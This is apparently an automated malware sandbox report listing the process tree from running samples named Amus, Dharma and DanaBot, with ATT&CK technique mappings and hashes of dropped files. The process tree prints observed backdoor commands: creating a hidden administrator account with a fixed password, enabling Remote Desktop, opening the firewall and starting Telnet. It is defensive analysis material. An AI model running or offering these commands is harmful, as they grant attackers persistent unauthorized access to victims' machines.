"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
2⤵
PID:3844

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
2⤵
PID:2928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
2⤵
PID:1408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
2⤵
PID:228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
2⤵
PID:3420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
2⤵
PID:4280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
2⤵
PID:5060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
2⤵
PID:4916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
2⤵
PID:3568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5316 /prefetch:8
2⤵
PID:3552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5704 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
2⤵
PID:1768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
2⤵
PID:1788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
2⤵
PID:1556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5888 /prefetch:8
2⤵
PID:1212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
2⤵
PID:1612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6780 /prefetch:8
2⤵
PID:1952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6972 /prefetch:8
2⤵
PID:848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6584 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
2⤵
PID:3444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6900 /prefetch:8
2⤵
PID:1884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
2⤵
PID:2132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4548 /prefetch:8
2⤵
PID:1868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6416 /prefetch:8
2⤵
PID:4640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6556 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4444 /prefetch:1
2⤵
PID:1420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1568 /prefetch:8
2⤵
PID:3656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3260 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:216

C:\Users\Admin\Downloads\Amus.exe
"C:\Users\Admin\Downloads\Amus.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4856

C:\Users\Admin\Downloads\Amus.exe
"C:\Users\Admin\Downloads\Amus.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4888

C:\Users\Admin\Downloads\Amus.exe
"C:\Users\Admin\Downloads\Amus.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
2⤵
PID:4884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5804 /prefetch:8
2⤵
PID:2968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1264 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1076

C:\Users\Admin\Downloads\Dharma.exe
"C:\Users\Admin\Downloads\Dharma.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2044

C:\Users\Admin\Downloads\ac\nc123.exe
"C:\Users\Admin\Downloads\ac\nc123.exe"
3⤵
- Executes dropped EXE
PID:4020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cls
4⤵
PID:4028

C:\Users\Admin\Downloads\ac\mssql.exe
"C:\Users\Admin\Downloads\ac\mssql.exe"
3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2824

C:\Users\Admin\Downloads\ac\mssql2.exe
"C:\Users\Admin\Downloads\ac\mssql2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
3⤵
PID:452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
3⤵
PID:5092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
4⤵
PID:1412

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Windows\SysWOW64\find.exe
Find "="
5⤵
PID:432

C:\Windows\SysWOW64\net.exe
net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
4⤵
PID:4424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
5⤵
PID:5036

C:\Windows\SysWOW64\net.exe
net localgroup Administrators systembackup /add
4⤵
PID:4516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators systembackup /add
5⤵
PID:3452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
4⤵
PID:3096

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
5⤵
PID:4184

C:\Windows\SysWOW64\find.exe
Find "="
5⤵
PID:3796

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" systembackup /add
4⤵
PID:2060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
5⤵
PID:2016

C:\Windows\SysWOW64\net.exe
net accounts /forcelogoff:no /maxpwage:unlimited
4⤵
PID:4264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
5⤵
PID:2712

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
4⤵
PID:2904

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
4⤵
PID:2116

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
4⤵
PID:2912

C:\Windows\SysWOW64\attrib.exe
attrib C:\users\systembackup +r +a +s +h
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4800

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 3389 "Remote Desktop"
4⤵
- Modifies Windows Firewall
PID:2416

C:\Windows\SysWOW64\sc.exe
sc config tlntsvr start=auto
4⤵
- Launches sc.exe
PID:2876

C:\Windows\SysWOW64\net.exe
net start Telnet
4⤵
PID:2264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Telnet
5⤵
PID:4428

C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
"C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4880

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2488

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4556

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4448

C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
1⤵
- Executes dropped EXE
PID:3672

C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@3672
2⤵
- Loads dropped DLL
PID:2416

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:2652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 948
4⤵
- Program crash
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 460
2⤵
- Program crash
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3672 -ip 3672
1⤵
PID:4640

C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
1⤵
- Executes dropped EXE
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 152
2⤵
- Program crash
PID:1792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3976 -ip 3976
1⤵
PID:2580

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1856

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2828

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4048

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x2ec
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4640

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa395d855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2652 -ip 2652
1⤵
PID:3800

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\0417ab16-1bde-486d-a234-5f7bf51bfc0a.tmp
Filesize
11KB

MD5
69f241edeaec0075f6240b4adbc47928

SHA1
98f28c859348e357bceece6d094a57f1b29bd8c7

SHA256
da8fc06eb30767f61c9a4b284883ef905938aeba8346ec2d4227257677ba9632

SHA512
ac0000b4d26f2779c891ca9f060e08f24a1073067b7c34dba02e37646db63e43c247b61462a6f476e6582c7f11a241bb3d7e928ee6e5094cfc2bea8a4d58e64d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
36bb45cb1262fcfcab1e3e7960784eaa

SHA1
ab0e15841b027632c9e1b0a47d3dec42162fc637

SHA256
7c6b0de6f9b4c3ca1f5d6af23c3380f849825af00b58420b76c72b62cfae44ae

SHA512
02c54c919f8cf3fc28f5f965fe1755955636d7d89b5f0504a02fcd9d94de8c50e046c7c2d6cf349fabde03b0fbbcc61df6e9968f2af237106bf7edd697e07456

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
1e3dc6a82a2cb341f7c9feeaf53f466f

SHA1
915decb72e1f86e14114f14ac9bfd9ba198fdfce

SHA256
a56135007f4dadf6606bc237cb75ff5ff77326ba093dff30d6881ce9a04a114c

SHA512
0a5223e8cecce77613b1c02535c79b3795e5ad89fc0a934e9795e488712e02b527413109ad1f94bbd4eb35dd07b86dd6e9f4b57d4d7c8a0a57ec3f7f76c7890a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011
Filesize
19KB

MD5
bfdcf12d621ea893e79ca269da93dd02

SHA1
5519303d3469cd9bbb4bf1e5ec31aa5eee5a5950

SHA256
39bd58789bcf50120e7032ec73512f9eae0e1774877e43130463c79da2e2f922

SHA512
dfaa03eb8ab710cdc11a1386d1a13b4f7624da12a1bbc3722541e4d5938a8022c58101f5597c3b2e4b545a39151308814c002c0d89a230bdae4f785ea0bc4fba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
3KB

MD5
a1d28cfb98aafbe4dd00d9765bc485ad

SHA1
84262b57e2bc71439ab6bdfde0f4b8e5a1e27c9d

SHA256
9412cda1ba95b10055effdb0a8c10601660a8def811e14201d1f28be70ddd2ba

SHA512
c62f2df1948b09e51717fd6d1b7f464582bf4644be70bb9272f535753513feaef9713d8d647e71bb2e8a470bffa2049d8467d2c2057fbfd7bc90fafdd1bfd6c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
3KB

MD5
2e231c4e0405ea3e7a4b8baa867c2992

SHA1
7e6dcec1d53fb4df8715b2d748b1e2f308cd92a4

SHA256
c0623ad8814eeb51eb02ce69dc9f35f11797c5facc207a7053e6b8cc8685d2bf

SHA512
29c660afcd1a55d624bfed6da357cf407eca355551bba225d0d5516bf890cfe4fa99fc1714e76a14a00154f37304228ba29a74148d24a2eb55f9afebdd32123e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
3KB

MD5
1047484bd37b38538f5cdaa01d6e311b

SHA1
8e378d1b0832d56038d481402370efadde01fb9f

SHA256
dcee9642de6663260cc1b09a596d9056c1df9f5c1a56aa1ac91579b6515d121f

SHA512
55c17ec5be66e0f687d782f2454ec00a442c887e3b234fb2d1e75058f4594afe762a53bd07c38080a9043acb2797cd77663b62fd848ea7aeb9141911ff4fc4dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
927B

MD5
34420d74b987ad8ffc29e7d9a7429f2a

SHA1
1e8b83ba8803e619ae23f1d6516f477580826053

SHA256
67e2193e72367de25b81b318dbe4e8dda2d245217b0dfb3e250477e78ea37382

SHA512
cb107f2eeb4d39b32172164a0402418e4761173636f27a3888dea11e8503cdc3b7aa800783a5bdf75b1e161b50abd2e23f860bf97d079de2d6d31bb31b5d45c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
1010B

MD5
ba5b36edb097a5de55b151d0da6cccc9

SHA1
a2d1851bef2e8149814b33120f3215a31bc9e124

SHA256
1313b53b3bc12a1dfb43b4236a39c5b41159048aaae947b03048f4b20e6a9e4e

SHA512
af2fe1693a5efddb59047a1b1be9f1cc9760c909235f2e1c34e7b6ce98eab669f432e45c11a01796dfb29ae28a827eb71ee051d4e4cbc9c62e355cb33e908de3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
20063d501a07205caa10cad031c0a9ef

SHA1
3d27cd4b8623167e411b407462ca552dc5aaae8b

SHA256
5354088aad0c39765b7d745414d3dbe69a8be96fea681331fcef4358d34de6f1

SHA512
b6f5547c2621d2f59b32d22d3fd95e45146881cf08864eff308785a25a454127675207d1e70905cd2cf54487bb638bc191dbd6048790bc0af1f98b749520ded3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
48ac27a3edd6c4d8845be9ad4da76790

SHA1
4e3907edbf7c83534bb21e82e4e96b33dc3e3ebc

SHA256
9e75c294cff62063def494a51ff13ad400774db54a49322c9a8481181d5855fe

SHA512
67d5113703f391894041a4e46349d160ec7cf652a0580c74be266ae4297cc6d5bacc3b6eb85d49e3d29cb61b1dbfbfec37ba490ea203eef08bcaf210bbd17964

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
ce45bfd880c6674d5627e89d321195ff

SHA1
c49a4f25c1b1bb2c066bade5fbd1edfcf893d189

SHA256
ad3e8af43367b12bf74aa35b08f9860d537c0f7692af9b51ea99c8adf6960b2c

SHA512
b37c7d716c79e0368bafe2f94af76a1222b76510d8f538aaeaa8785be0aadfae15d8ecb805af0e0cea12d5e376ff9907cc4022bed17980ccaa2d022d010faf92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
062201ad08268caa95935c0e73978daf

SHA1
eca9fd46bfcc63c0bfd8a09d6e3e8bbff07f3315

SHA256
a888b50d54a66aca889d4375675a365cf3428dd22cf59a23be44ef2d605ea01f

SHA512
2e35889c8e418095fdaff3b9d28f5f16300e7630105f31c702296793de4e683abf647c0dd663ae99b96006598094142726509000c1d59342ff5c18613291e232

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
4534fb6d4eeb5a02b9dae1af2a4ee064

SHA1
83abcb2e118fcc6b993ecdf9a33ea8d19dc653ce

SHA256
0937b00ae952405c70eae065cc9d258bae48c671c3d416e0dc93b9781bcfc285

SHA512
